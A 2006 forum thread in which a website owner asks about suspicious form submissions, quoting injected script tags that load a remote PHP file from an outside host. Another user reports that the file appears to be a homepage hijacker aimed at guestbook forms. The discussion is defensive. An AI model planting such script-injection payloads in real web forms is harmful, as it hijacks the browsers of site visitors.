Suspicious form submissions with scripts

***zigar*** · December 19th, 2006, 04:00 PM

I have several form submission areas on one of my websites which sends me an email via coldfusion's cfmail tag and I've received several similar to this over the last couple of weeks. My suspicion is that this is a bot submitting nasty code (which is sanitized by my form submission server side code or Blink (or both)

The code in the email is

<InvalidTag src=http://nmaq.com/q.php>jonny454</script> jonny914@gmail.com <InvalidTag src=http://nmaq.com/q.php>jonny937</script> <InvalidTag src=http://nmaq.com/q.php>jonny365</script> <InvalidTag src=http://nmaq.com/q.php>jonny368</script>

anyone seen this before... anyone with a system they don't care about care to pop over to nmaq.com and see what q.php does

**alakhiyar** · December 20th, 2006, 06:50 AM

Edited to remove the actual email address. I can go to that site, what exactly would you like me to do?

**alakhiyar** · December 21st, 2006, 01:00 PM

It's a fairly basic homepage hijacker as far as I can tell. (Nobody trust your system to that 30-second analysis please...)

I suspect it's a bot hoping for guestbook type forms where it can post the code to your website and other visitors will get it.

Thread: Suspicious form submissions with scripts

Thread Tools

Display

Suspicious form submissions with scripts

Posting Permissions